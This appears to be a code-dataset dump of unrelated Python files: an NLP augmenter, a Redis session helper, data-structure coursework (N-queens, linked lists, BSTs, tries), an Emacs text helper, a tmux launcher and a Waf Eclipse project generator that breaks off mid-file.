aug = naw.Word2vecAug()\n \"\"\"\n\n def __init__(self, model_path='.', model=None, action=Action.SUBSTITUTE,\n name='Word2vec_Aug', aug_min=1, aug_p=0.3, aug_n=5, stopwords=None,\n tokenizer=None, reverse_tokenizer=None, force_reload=False, verbose=0):\n super().__init__(\n model_path=model_path, aug_n=aug_n,\n action=action, name=name, aug_p=aug_p, aug_min=aug_min, stopwords=stopwords,\n tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, verbose=verbose)\n\n if model is None:\n self.model = self.get_model(force_reload=force_reload)\n else:\n self.model = model\n\n def get_model(self, force_reload=False):\n return init_word2vec_model(self.model_path, force_reload)\n","sub_path":"nlpaug/augmenter/word/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427685511","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n# copyright 2016 Wshuai, Inc.\n# All Rights Reserved.\n\n# @author: WShuai Inc.\n\nimport uuid\nimport time\n\nclass CommSession(object):\n def __init__(self, redis_handler, LOG, expire_time = None):\n self.expire_time = expire_time\n self.redis_handler = redis_handler\n self.LOG = LOG\n self.session = None\n return\n\n def save_session(self, user_name):\n self.session = str(uuid.uuid4()).replace('-','').upper()\n self.update_session(self.session, user_name)\n return self.session\n\n def update_session(self, session, user_name):\n now = self.redis_handler.redis_conn.time()[0]\n expire_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(now + self.expire_time))\n items = {\n 'user_name': user_name,\n 'expire': expire_time\n }\n self.redis_handler.redis_conn.hmset('%s:%s' % (user_name, session), items)\n self.redis_handler.redis_conn.expire('%s:%s' % (user_name, session), self.expire_time)\n return\n\n def auth_session(self, session, user_name):\n ret = False\n try:\n session_user_name = self.redis_handler.redis_conn.hget('%s:%s' % (user_name, session), 'user_name')\n if session_user_name == user_name:\n self.LOG.info('this user [%s] session [%s] is successful!' % (user_name, session))\n ret = True\n else:\n self.LOG.info('this user [%s] session [%s] is unmatched!' % (user_name, session))\n self.update_session(session, user_name)\n ret = False\n except:\n self.LOG.error('this user [%s] session [%s] is expired!' % (user_name, session))\n ret = False\n return ret\n\n def verify_repeat_login(self, user_name):\n keys = self.redis_handler.redis_conn.keys('%s:*' % user_name)\n if not keys:\n return True\n else:\n return False\n\n def remove_session(self, session, user_name):\n self.redis_handler.redis_conn.delete('%s:%s' % (user_name, session))\n return\n\n","sub_path":"src/common/commSession.py","file_name":"commSession.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"214315890","text":"from ProcessData.BrakingModules.python_wrapper_braking import getbrakinginfo\nimport numpy as np\n\nLATENCY = 1\nDRIVER_RESPONSE = 1\n\ndef checkBraking(velocity, distance, safe_time = 5):\n braking_distance, arrival_time = getbrakinginfo(velocity)\n\n safe_distance = (safe_time + LATENCY+DRIVER_RESPONSE) * velocity + braking_distance\n critical_distance = (LATENCY+DRIVER_RESPONSE)*velocity + braking_distance\n\n if distance < critical_distance:\n return 1\n if distance <= safe_distance :\n maxtime = safe_time # interval : [t_L + t_d <= t <= (dis_safe-dis_brake)/velocity)\n mintime = (LATENCY + DRIVER_RESPONSE)\n x = (distance-braking_distance)/velocity - (maxtime + mintime)/2\n return 1-(1/(1+np.exp(-x)))\n return 0\n\n\n\n\n\n\n\n","sub_path":"ProcessData/BrakingModules/check_braking.py","file_name":"check_braking.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640076412","text":"from collections import deque\nfrom itertools import permutations\nimport string\n\n# Oprdacht 1\nprint(\"\\n\\nOpdracht 3 \")\n\ndef check(a,i): # ga na of i aan a toegevoegd kan worden\n n = len(a)\n return not (i in a or\n # niet in dezelfde kolom\n i+n in [a[j]+j for j in range(n)] or\n # niet op dezelfde diagonaal\n i-n in [a[j]-j for j in range(n)])\n # niet op dezelfde diagonaal\n\ndef printQueens(a):\n n = len(a)\n for i in range(n):\n for j in range(n):\n if a[i] == j:\n print(\"X\",end= \" \")\n else:\n print(\"*\",end= \" \")\n print(\"\\n\")\n\ndef rsearch(N):\n global a\n for i in range(N):\n if check(a,i):\n a.append(i)\n if len(a) == N and a not in b:\n b.append(a)\n a = []\n return True # geschikte a gevonden\n else:\n if rsearch(N):\n rsearch(N)\n return True\n del a[-1] # verwijder laatste element\n return False\na = [] # a geeft voor iedere rij de kolompositie aan\nb = []\nt = 0\n\nrsearch(6)\n# print(a)\n#printQueens(a)\nprint(b)\n\n\n# Opdracht 2\nprint(\"\\n\\nOpdracht 2 \")\nclass ListNode:\n def __init__(self,data,next_node):\n self.data = data\n self.next = next_node\n\n def __repr__(self):\n return str(self.data)\n\nclass MyCircularList:\n def __init__(self):\n self.tail = None\n\n def __repr__(self):\n s = ''\n current = self.tail.next\n if current:\n s = s + str(current)\n current = current.next\n while current != self.tail.next:\n s = s + \" -> \" + str(current)\n current = current.next\n if not s: # s == '':\n s = 'empty list'\n return s\n\n def append(self,e):\n if not self.tail: # self.head == None:\n self.tail = ListNode(e,None)\n self.tail.next = self.tail\n else:\n n = ListNode(e, self.tail.next)\n self.tail.next = n\n self.tail = n\n\n\n def delete(self, e):\n if self.tail:\n if self.tail.data == e:\n if self.tail.next == self.tail:\n self.tail = None # prints empty list\n else:\n current = self.tail\n\n while current.next != self.tail:\n current = current.next\n\n current.next = current.next.next\n self.tail = current\n\n elif self.tail.next != self.tail:\n current = self.tail\n\n while current.next.data != e and current.next != self.tail:\n current = current.next\n if current.next.data == e:\n current.next = current.next.next\n\n def showLevelOrder(self, queue = deque()):\n for layer in self.root.showLevelOrder():\n print(' '.join([str(l) for l in layer]))\n\n\nmylist = MyCircularList()\nmylist.append(1)\nprint(mylist)\nmylist.append(2)\nprint(mylist)\nmylist.append(3)\nprint(mylist)\nmylist.append(4)\nprint(mylist)\nmylist.delete(4)\nprint(mylist)\n\n\n# Opdracht 3\nprint(\"\\n\\nOpdracht 3 \")\nclass BSTNode:\n def __init__(self,element,left,right):\n self.element = element\n self.left = left\n self.right = right\n\n def __repr__(self,nspaces=0):\n s1 = ''\n s2 = ''\n s3 = ''\n if self.right != None:\n s1 = self.right.__repr__(nspaces + 3)\n s2 = s2 + ' '*nspaces + str(self.element) + '\\n'\n if self.left != None:\n s3 = self.left.__repr__(nspaces + 3)\n return s1 + s2 + s3\n\n def insert(self,e):\n parent = self\n current = None\n found = False\n\n if parent.element < e:\n current = parent.right\n elif parent.element > e:\n current = parent.left\n else:\n found = True;\n\n while not found and current:\n parent = current\n if parent.element < e:\n current = parent.right\n elif parent.element > e:\n current = parent.left\n else:\n found = True\n\n if not found:\n if parent.element < e:\n parent.right = BSTNode(e,None,None)\n else:\n parent.left = BSTNode(e,None,None)\n return not found\n\n def insertArray(self,a, low=0, high=-1):\n if len(a) == 0:\n return\n if high == -1:\n high = len(a)-1\n mid = (low+high+1)//2\n self.insert(a[mid])\n if mid > low:\n self.insertArray(a,low,mid-1)\n if high > mid:\n self.insertArray(a,mid + 1,high)\n\n def search(self,e):\n current = self\n found = False\n while not found and current:\n if current.element < e:\n current = current.right\n elif current.element > e:\n current = current.left\n else:\n found = True\n if found:\n return current\n else:\n return None\n\n def search2(self,e):\n if self.element == e:\n return self\n parent = self.getParent(e)\n if parent == None:\n return None\n if parent.element < e:\n return parent.right\n return parent.left\n\n def getParent(self,e):\n parent = self\n current = None\n found = False\n\n if parent.element < e:\n current = parent.right\n elif parent.element > e:\n current = parent.left;\n else:\n return None\n\n while not found and current:\n if current.element == e:\n found = True\n else:\n parent = current\n if current.element < e:\n current = current.right\n else:\n current = current.left\n if found:\n return parent\n else:\n return None\n\n def parentMinRightTree(self):\n parent = self.right\n current = parent.left\n while current.left:\n parent = current\n current = current.left\n return parent\n\n def delete(self,e):\n parent = self.getParent(e);\n\n if parent == None:\n return False\n if parent.element < e:\n current = parent.right\n if current.left == None:\n parent.right = parent.right.right\n return True\n else:\n if current.right == None:\n parent.right = parent.right.left\n return True\n else:\n current = parent.left\n if current.left == None:\n parent.left = parent.left.right\n return True\n else:\n if current.right == None:\n parent.left = parent.left.left\n return True\n if current.right.left == None:\n current.element = current.right.element\n current.right = current.right.right\n return True\n node = current.parentMinRightTree()\n current.element = node.left.element\n node.left = node.left.right\n return True\n\n def max(self):\n if self.right:\n return self.right\n else:\n return self.element\n\n def showLevelOrder(self):\n q = deque()\n q.append(self)\n def iterator(layerSize):\n for i in range(layerSize):\n node = q.popleft()\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n yield node.element\n while (q):\n yield iterator(len(q))\n\nclass BST:\n def __init__(self,a=None):\n if a:\n mid = len(a)//2\n self.root = BSTNode(a[mid],None,None)\n self.root.insertArray(a[:mid])\n self.root.insertArray(a[mid+1:])\n else:\n self.root = None\n\n def __repr__(self):\n if self.root:\n return str(self.root)\n else:\n return 'null-tree'\n\n def search(self,e):\n if self.root and e:\n return self.root.search(e)\n else:\n return None\n\n def insert(self,e):\n if e:\n if self.root:\n return self.root.insert(e)\n else:\n self.root = BSTNode(e,None,None)\n return True\n else:\n return False\n\n def delete(self,e):\n if self.root and e:\n if self.root.element == e:\n if self.root.left == None:\n self.root = self.root.right\n elif self.root.right == None:\n self.root = self.root.left\n elif self.root.right.left == None:\n self.root.element = self.root.right.element\n self.root.right = self.root.right.right\n else:\n node = self.root.parentMinRightTree();\n self.root.element = node.left.element\n node.left = node.left.right\n return True\n else:\n return self.root.delete(e)\n else:\n return False\n\n def max(self):\n if self.root:\n if self.root.right is not None:\n return self.root.right.max()\n else:\n return self.root.element\n else:\n return \"Empty Tree\"\n\n def rsearch(self, e):\n return self.find(self.root, e)\n\n def find(self, currentNode, e):\n if currentNode is None:\n return False\n elif currentNode.element == e:\n return currentNode;\n elif e < currentNode.element:\n return self.find(currentNode.left, e)\n else:\n return self.find(currentNode.right, e)\n\n def rinsert(self, e):\n if self.root == None:\n self.root = BSTNode(e,None,None)\n else:\n return self._rinsert(self.root, e)\n\n def _rinsert(self, currentNode, e):\n if currentNode.element > e:\n if currentNode.left:\n self._rinsert(currentNode.left,e)\n else:\n currentNode.left = BSTNode(e,None,None)\n elif currentNode.element <= e:\n if currentNode.right:\n self._rinsert(currentNode.right,e)\n return True;\n else:\n currentNode.right = BSTNode(e,None,None)\n\n def showLevelOrder(self):\n for layer in self.root.showLevelOrder():\n print(' '.join([str(l) for l in layer]))\n\n\nb = BST()\nb.rinsert(1)\nprint(b)\nb.rinsert(2)\nprint(b)\nb.rinsert(3)\nprint(b)\nb.rinsert(4)\nprint(b)\nb.delete(4)\nprint(b)\n\nprint(\"Max = \", b.max())\nprint(b.rsearch(3))\nprint('----------------')\n\nb = BST()\nb.insert(4)\nb.insert(2)\nb.insert(1)\nb.insert(3)\nb.insert(6)\nb.insert(5)\nb.insert(7)\n\nprint(b)\nb.showLevelOrder()\n\n#Opdracht 4\nprint(\"Opdracht 4\")\n\nfrom itertools import permutations\nfrom itertools import combinations\nfrom collections import deque\nimport string\nimport operator\n\ndef hasNumbers(inputString):\n return any(char.isdigit() for char in inputString)\n\ndef filterText(txt):\n return [word.strip(string.punctuation).lower() for word in txt.split() if not hasNumbers(word)]\n\ndef readFile(path):\n f = open(path, \"r\")\n data = f.read()\n f.close()\n return data\n\ndef writeFile(path, data):\n f = open(path,\"r+\")\n for key, value in data.items():\n f.write(key + \" :: \" + str(value) + \"\\n\")\n f.close()\n\ndef analyzeWithDict(text):\n words = filterText(text)\n dic = {}\n for word in words:\n if word in dic:\n dic[word] += 1\n else:\n dic[word] = 1\n return dic\n\nclass Word:\n def __init__(self):\n self.count = 1\n self.branch = {}\n self.terminate = False\n\n def __repr__(self):\n return str(self.branch) + \":\" + str(self.count) + \"\\n\"\n\n def writeWords(self, string, f):\n for i in self.branch:\n s = string + str(i)\n value = str(self.branch[i].count)\n\n if self.branch[i].terminate:\n line = s + \" :: \" + str(value) + \"\\n\"\n f.write(line)\n\n self.branch[i].writeWords(s, f)\n\n\nclass Trie:\n\tdef __init__(self, file_name = None):\n\t\tself.root = Word()\n\n\tdef __repr__(self):\n\t\treturn str(self.root)\n\n\tdef insert(self, string):\n if self.root:\n current = self.root\n for index, letter in enumerate(string):\n if letter in current.branch:\n current = current.branch[letter]\n current.count += 1\n else:\n current.branch.update({ letter: Word() })\n current = current.branch[letter]\n if (index + 1) == len(string):\n current.terminate = True\n else:\n return\n\n\tdef writeWords(self, f):\n\t\tself.root.writeWords(\"\", f)\n\ntrie = Trie()\n\ndef analyzeWTrie(text):\n words = filterText(text)\n for word in words:\n trie.insert(word)\n\n# input source file\ndata = (readFile(\"kingjamesbible.txt\"))\n\nanalyzedDictionary = analyzeWithDict(data)\nwriteFile(\"outputDict.txt\", analyzedDictionary)\n\nanalyzeWTrie(data)\n\n# write the trie to a file\nf = open(\"outputTrie.txt\", \"w\")\ntrie.writeWords(f)\nf.close()\n\n\ndef compareFiles(dictPath, triePath):\n dic = toDictionary(dictPath)\n trie = toDictionary(triePath)\n\n print('dictonary length: ', len(dic))\n print('trie length: ', len(trie))\n\n shared_items = set(dic.items()) & set(trie.items())\n differences = { k : dic[k] for k in set(dic) - set(trie) }\n\n print('differences', differences)\n print('shared items', len(shared_items))\n print('are equel', dic == trie)\n\ndef toDictionary(path):\n dic = { }\n with open(path) as f:\n for line in f:\n key = line.split('::')[0].strip(string.whitespace)\n key = key.lower()\n value = line.split('::')[1].strip(string.whitespace)\n dic[key] = value\n return dic\n\ncompareFiles(\"outputDict.txt\", \"outputTrie.txt\")\n\n\n# wordcount = {}\n# fileSource = \"kingjamesbible.txt\"\n# wordcount = readFileIntoDic(fileSource)\n# print(wordcount)\n# writeDicTofile(wordcount)\n\ntrie = Trie()\nword = \"aapje\"\ntrie.insert(\"aap\")\n","sub_path":"week3.py","file_name":"week3.py","file_ext":"py","file_size_in_byte":14406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"425368374","text":"import mdlog\nlog = mdlog.getLogger(__name__)\n\nfrom Actions import Text\nfrom rules.emacs.Cmd import runEmacsCmd\n\ndef emacsBool(b):\n if b:\n return \"t\"\n return \"nil\"\n\nclass EmacsText(Text):\n def __init__(self, data, lower=True, capitalCheck=True, spaceCheck=True,\n allCaps=False):\n Text.__init__(self, data, lower=lower)\n self.capitalCheck = capitalCheck and not allCaps\n self.spaceCheck = spaceCheck \n self.allCaps = allCaps\n\n def _print(self, words):\n # There's no good elisp way to handle putting characters into\n # the search box AFAIK. You can get text in there but giving it\n # focus disables search as you type.\n inSearchMode = runEmacsCmd(\"isearch-mode\") != 'nil'\n inMiniBuffer = '*Minibuf-' in runEmacsCmd(\"(with-current-buffer (buffer-name))\")\n words = words if not self.allCaps else [i.upper() for i in words]\n if inSearchMode or inMiniBuffer:\n Text._print(self, words)\n else:\n runEmacsCmd(\"(md-insert-text \\\"%s\\\" %s %s)\" % (words, emacsBool(self.spaceCheck),\n emacsBool(self.capitalCheck)), dolog=True,\n queryOnly=False)\n \n","sub_path":"rules/emacs/Text.py","file_name":"Text.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"550704364","text":"class Trie(object):\n def __init__(self):\n self.sons = {}\n\n def insert(self, word):\n p = self.sons\n for x in word:\n if x not in p:\n p[x] = {}\n p = p[x]\n p['end'] = p.get('end', 0) + 1\n\n def search(self, word):\n p = self.sons\n for x in word:\n if x not in p:\n return 0\n p = p[x]\n return p.get('end', 0)\n\n\nclass WordsFrequency(object):\n \"\"\"\n设计一个方法,找出任意指定单词在一本书中的出现频率。\n你的实现应该支持如下操作:\nWordsFrequency(book)构造函数,参数为字符串数组构成的一本书\nget(word)查询指定单词在书中出现的频率\n\n示例:\nWordsFrequency wordsFrequency = new WordsFrequency({\"i\", \"have\", \"an\", \"apple\", \"he\", \"have\", \"a\", \"pen\"});\nwordsFrequency.get(\"you\"); //返回0,\"you\"没有出现过\nwordsFrequency.get(\"have\"); //返回2,\"have\"出现2次\nwordsFrequency.get(\"an\"); //返回1\nwordsFrequency.get(\"apple\"); //返回1\nwordsFrequency.get(\"pen\"); //返回1\n提示:\nbook[i]中只包含小写字母\n1 <= book.length <= 100000\n1 <= book[i].length <= 10\nget函数的调用次数不会超过100000\n链接:https://leetcode-cn.com/problems/words-frequency-lcci\n \"\"\"\n def __init__(self, book):\n \"\"\"\n :type book: List[str]\n \"\"\"\n self.trie = Trie()\n for word in book:\n self.trie.insert(word)\n\n def get(self, word):\n \"\"\"\n :type word: str\n :rtype: int\n \"\"\"\n return self.trie.search(word)\n\n\ndef main():\n commands = [\"WordsFrequency\",\"get\",\"get\",\"get\",\"get\",\"get\"], \\\n [[[\"i\",\"have\",\"an\",\"apple\",\"he\",\"have\",\"a\",\"pen\"]],[\"you\"],[\"have\"],[\"an\"],[\"apple\"],[\"pen\"]]\n ret = []\n for i, x in enumerate(commands[0]):\n if x == 'WordsFrequency':\n test = WordsFrequency(commands[1][i][0])\n ret.append(None)\n elif x == 'get':\n ret.append(test.get(commands[1][i][0]))\n\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"py-程序员面试金典-面试题 16.02. 单词频率-字典树套哈希表.py","file_name":"py-程序员面试金典-面试题 16.02. 单词频率-字典树套哈希表.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"105097523","text":"import sys\nimport os\n\nprint(\"\"\"Select session to initialize:\n1. TERM\n2. Haskell IDE\n\nPress enter to quit\n\"\"\")\nwhile True:\n\n answer = input(\"Selection: \")\n\n if (answer == \"\"):\n sys.exit()\n elif answer == 1:\n os.system(\"tmuxinator start TERM\")\n sys.exit()\n elif answer == 2:\n os.system(\"tmuxinator start haskell\")\n sys.exit()\n else:\n print(\"Not a valid choice.\")\n","sub_path":"dotfiles/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"424811976","text":"class Node:\n\n\tdef __init__(self):\n\t\tself.word_number = -1\n\t\tself.visited = False\n\t\tself.cnt = [0 for i in range(26)]\n\t\tself.next = {}\n\nclass Trie:\n\n\tdef __init__(self):\n\t\tself.root = Node()\n\t\tself.word_index = 0\n\t\tself.words = []\n\n\tdef add(self, word):\n\t\titerator = self.root\n\n\t\t# save the word in self.words\n\t\tself.words.append(word)\n\n\t\t# save the word in the trie\n\t\tfor char in word:\n\t\t\tif char not in iterator.next:\n\t\t\t\titerator.next[char] = Node()\n\t\t\titerator = iterator.next[char]\n\t\titerator.word_number = self.word_index\n\t\tself.word_index += 1\n\n\tdef find(self, word):\n\t\titerator = self.root\n\t\tfor char in word:\n\t\t\tif char not in iterator.next:\n\t\t\t\treturn False\n\t\t\titerator = iterator.next[char]\n\t\treturn iterator.is_word","sub_path":"share/anagram/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"163955878","text":"#! /usr/bin/env python\n# Eclipse CDT 5.0 generator for Waf\n# Richard Quirk 2009-1011 (New BSD License)\n# Thomas Nagy 2011 (ported to Waf 1.6)\n\"\"\"\nUsage:\n\ndef options(opt):\n\topt.load('eclipse')\n\n$ waf configure eclipse\n\"\"\"\nimport os\nimport sys\nfrom xml.dom.minidom import Document\n\nfrom waflib import Build\nfrom waflib import Context\nfrom waflib import Errors\nfrom waflib import Logs\nfrom waflib import Node\nfrom waflib import Scripting\nfrom waflib import TaskGen\nfrom waflib import Utils\n\nSTANDARD_INCLUDES = [\"/usr/local/include\", \"/usr/include\"]\n\noe_cdt = \"org.eclipse.cdt\"\ncdt_mk = oe_cdt + \".make.core\"\ncdt_core = oe_cdt + \".core\"\ncdt_bld = oe_cdt + \".build.core\"\nextbuilder_dir = \".externalToolBuilders\"\nextbuilder_name = \"Waf_Builder.launch\"\n\n\nclass eclipse(Build.BuildContext):\n cmd = \"eclipse\"\n fun = Scripting.default_cmd\n\n def execute(self):\n \"\"\"\n Entry point\n \"\"\"\n self.restore()\n if not self.all_envs:\n self.load_envs()\n self.recurse([self.run_dir])\n\n appname = getattr(\n Context.g_module, Context.APPNAME, os.path.basename(self.srcnode.abspath())\n )\n self.create_cproject(appname, pythonpath=self.env[\"ECLIPSE_PYTHON_PATH\"])\n\n # Helper to dump the XML document content to XML with UTF-8 encoding\n def write_conf_to_xml(self, filename, document):\n self.srcnode.make_node(filename).write(\n document.toprettyxml(encoding=\"UTF-8\"), flags=\"wb\"\n )\n\n def create_cproject(self, appname, workspace_includes=[], pythonpath=[]):\n \"\"\"\n Create the Eclipse CDT .project and .cproject files\n @param appname The name that will appear in the Project Explorer\n @param build The BuildContext object to extract includes from\n @param workspace_includes Optional project includes to prevent\n \"Unresolved Inclusion\" errors in the Eclipse editor\n @param pythonpath Optional project specific python paths\n \"\"\"\n hasc = hasjava = haspython = False\n source_dirs = []\n cpppath = self.env[\"CPPPATH\"]\n javasrcpath = []\n javalibpath = []\n includes = STANDARD_INCLUDES\n if sys.platform != \"win32\":\n cc = self.env.CC or self.env.CXX\n if cc:\n cmd = cc + [\"-xc++\", \"-E\", \"-Wp,-v\", \"-\"]\n try:\n gccout = self.cmd_and_log(\n cmd, output=Context.STDERR, quiet=Context.BOTH, input=b\"\\n\"\n ).splitlines()\n except Errors.WafError:\n pass\n else:\n includes = []\n for ipath in gccout:\n if ipath.startswith(\" /\"):\n includes.append(ipath[1:])\n cpppath += includes\n Logs.warn(\"Generating Eclipse CDT project files\")\n\n for g in self.groups:\n for tg in g:\n if not isinstance(tg, TaskGen.task_gen):\n continue\n\n tg.post()\n\n # Add local Python modules paths to configuration so object resolving will work in IDE\n # This may also contain generated files (ie. pyqt5 or protoc) that get picked from build\n if \"py\" in tg.features:\n pypath = tg.path.relpath()\n py_installfrom = getattr(tg, \"install_from\", None)\n if isinstance(py_installfrom, Node.Node):\n pypath = py_installfrom.path_from(\n self.root.make_node(self.top_dir)\n )\n if pypath not in pythonpath:\n pythonpath.append(pypath)\n haspython = True\n\n # Add Java source directories so object resolving works in IDE\n # This may also contain generated files (ie. protoc) that get picked from build\n if \"javac\" in tg.features:\n java_src = tg.path.relpath()\n java_srcdir = getattr(tg.javac_task, \"srcdir\", None)\n if java_srcdir:\n if isinstance(java_srcdir, Node.Node):\n java_srcdir = [java_srcdir]\n for x in Utils.to_list(java_srcdir):\n x = x.path_from(self.root.make_node(self.top_dir))\n if x not in javasrcpath:\n javasrcpath.append(x)\n else:\n if java_src not in javasrcpath:\n javasrcpath.append(java_src)\n hasjava = True\n\n # Check if there are external dependencies and add them as external jar so they will be resolved by Eclipse\n usedlibs = getattr(tg, \"use\", [])\n for x in Utils.to_list(usedlibs):\n for cl in Utils.to_list(tg.env[\"CLASSPATH_\" + x]):\n if cl not in javalibpath:\n javalibpath.append(cl)\n\n if not getattr(tg, \"link_task\", None):\n continue\n\n features = Utils.to_list(getattr(tg, \"features\", \"\"))\n\n is_cc = \"c\" in features or \"cxx\" in features\n\n incnodes = tg.to_incnodes(\n tg.to_list(getattr(tg, \"includes\", [])) + tg.env[\"INCLUDES\"]\n )\n for p in incnodes:\n path = p.path_from(self.srcnode)\n\n if path.startswith(\"/\"):\n cpppath.append(path)\n else:\n workspace_includes.append(path)\n\n if is_cc and path not in source_dirs:\n source_dirs.append(path)\n\n hasc = True\n\n waf_executable = os.path.abspath(sys.argv[0])\n project = self.impl_create_project(\n sys.executable, appname, hasc, hasjava, haspython, waf_executable\n )\n self.write_conf_to_xml(\".project\", project)\n\n if hasc:\n project = self.impl_create_cproject(\n sys.executable,\n waf_executable,\n appname,\n workspace_includes,\n cpppath,\n source_dirs,\n )\n self.write_conf_to_xml(\".cproject\", project)\n\n if haspython:\n project = self.impl_create_pydevproject(sys.path, pythonpath)\n self.write_conf_to_xml(\".pydevproject\", project)\n\n if hasjava:\n project = self.impl_create_javaproject(javasrcpath, javalibpath)\n self.write_conf_to_xml(\".classpath\", project)\n\n def impl_create_project(\n self, executable, appname, hasc, hasjava, haspython, waf_executable\n ):\n doc = Document()\n projectDescription = doc.createElement(\"projectDescription\")\n self.add(doc, projectDescription, \"name\", appname)\n self.add(doc, projectDescription, \"comment\")\n self.add(doc, projectDescription, \"projects\")\n buildSpec = self.add(doc, projectDescription, \"buildSpec\")\n buildCommand = self.add(doc, buildSpec, \"buildCommand\")\n self.add(doc, buildCommand, \"triggers\", \"clean,full,incremental,\")\n arguments = self.add(doc, buildCommand, \"arguments\")\n dictionaries = {}\n\n # If CDT is present, instruct this one to call waf as it is more flexible (separate build/clean ...)\n if hasc:\n self.add(\n doc,\n buildCommand,\n \"name\",\n oe_cdt + \".managedbuilder.core.genmakebuilder\",\n )\n # the default make-style targets are overwritten by the .cproject values\n dictionaries = {\n cdt_mk + \".contents\": cdt_mk + \".activeConfigSettings\",\n cdt_mk + \".enableAutoBuild\": \"false\",\n cdt_mk + \".enableCleanBuild\": \"true\",\n cdt_mk + \".enableFullBuild\": \"true\",\n }\n else:\n # Otherwise for Java/Python an external builder tool is created that will call waf build\n self.add(\n doc,\n buildCommand,\n \"name\",\n \"org.eclipse.ui.externaltools.ExternalToolBuilder\",\n )\n dictionaries = {\n \"LaunchConfigHandle\": \"/%s/%s\"\n % (extbuilder_dir, extbuilder_name)\n }\n # The definition is in a separate directory XML file\n try:\n os.mkdir(extbuilder_dir)\n except OSError:\n pass # Ignore error if already exists\n\n # Populate here the external builder XML calling waf\n builder = Document()\n launchConfiguration = doc.createElement(\"launchConfiguration\")\n launchConfiguration.setAttribute(\n \"type\",\n \"org.eclipse.ui.externaltools.ProgramBuilderLaunchConfigurationType\",\n )\n self.add(\n doc,\n launchConfiguration,\n \"booleanAttribute\",\n {\n \"key\": \"org.eclipse.debug.ui.ATTR_LAUNCH_IN_BACKGROUND\",\n \"value\": \"false\",\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"booleanAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_TRIGGERS_CONFIGURED\",\n \"value\": \"true\",\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"stringAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_LOCATION\",\n \"value\": waf_executable,\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"stringAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_RUN_BUILD_KINDS\",\n \"value\": \"full,incremental,\",\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"stringAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_TOOL_ARGUMENTS\",\n \"value\": \"build\",\n },\n )\n self.add(\n doc,\n launchConfiguration,\n \"stringAttribute\",\n {\n \"key\": \"org.eclipse.ui.externaltools.ATTR_WORKING_DIRECTORY\",\n \"value\": \"${project_loc}\",\n },\n )\n builder.appendChild(launchConfiguration)\n # And write the XML to the file references before\n self.write_conf_to_xml(\n f\"{extbuilder_dir}{os.path.sep}{extbuilder_name}\", builder\n )\n\n for k, v in dictionaries.items():\n self.addDictionary(doc, arguments, k, v)\n\n natures = self.add(doc, projectDescription, \"natures\")\n\n if hasc:\n nature_list = \"\"\"\n\t\t\t\tcore.ccnature\n\t\t\t\tmanagedbuilder.core.ScannerConfigNature\n\t\t\t\tmanagedbuilder.core.managedBuildNature\n\t\t\t\tcore.cnature\n\t\t\t\"\"\".split()\n for n in nature_list:\n self.add(doc, natures, \"nature\", oe_cdt + \".\" + n)\n\n if haspython:\n self.add(doc, natures, \"nature\", \"org.python.pydev.pythonNature\")\n if hasjava:\n self.add(doc, natures, \"nature\", \"org.eclipse.jdt.core.javanature\")\n\n doc.appendChild(projectDescription)\n return doc\n\n def impl_create_cproject(\n self,\n executable,\n waf_executable,\n appname,\n workspace_includes,\n cpppath,\n source_dirs=[],\n ):\n doc = Document()\n doc.appendChild(doc.createProcessingInstruction(\"fileVersion\", \"4.0.0\"))\n cconf_id = cdt_core + \".default.config.1\"\n cproject = doc.createElement(\"cproject\")\n storageModule = self.add(\n doc, cproject, \"storageModule\", {\"moduleId\": cdt_core + \".settings\"}\n )\n cconf = self.add(doc, storageModule, \"cconfiguration\", {\"id\": cconf_id})\n\n storageModule = self.add(\n doc,\n cconf,\n \"storageModule\",\n {\n \"buildSystemId\": oe_cdt\n + \".managedbuilder.core.configurationDataProvider\",\n \"id\": cconf_id,\n \"moduleId\": cdt_core + \".settings\",\n \"name\": \"Default\",\n },\n )\n\n self.add(doc, storageModule, \"externalSettings\")\n\n extensions = self.add(doc, storageModule, \"extensions\")\n extension_list = \"\"\"\n\t\t\tVCErrorParser\n\t\t\tMakeErrorParser\n\t\t\tGCCErrorParser\n\t\t\tGASErrorParser\n\t\t\tGLDErrorParser\n\t\t\"\"\".split()\n self.add(\n doc,\n extensions,\n \"extension\",\n {\"id\": cdt_core + \".ELF\", \"point\": cdt_core + \".BinaryParser\"},\n )\n for e in extension_list:\n self.add(\n doc,\n extensions,\n \"extension\",\n {\"id\": cdt_core + \".\" + e, \"point\": cdt_core + \".ErrorParser\"},\n )\n\n storageModule = self.add(\n doc,\n cconf,\n \"storageModule\",\n {\"moduleId\": \"cdtBuildSystem\", \"version\": \"4.0.0\"},\n )\n config = self.add(\n doc,\n storageModule,\n \"configuration\",\n {\n \"artifactName\": appname,\n 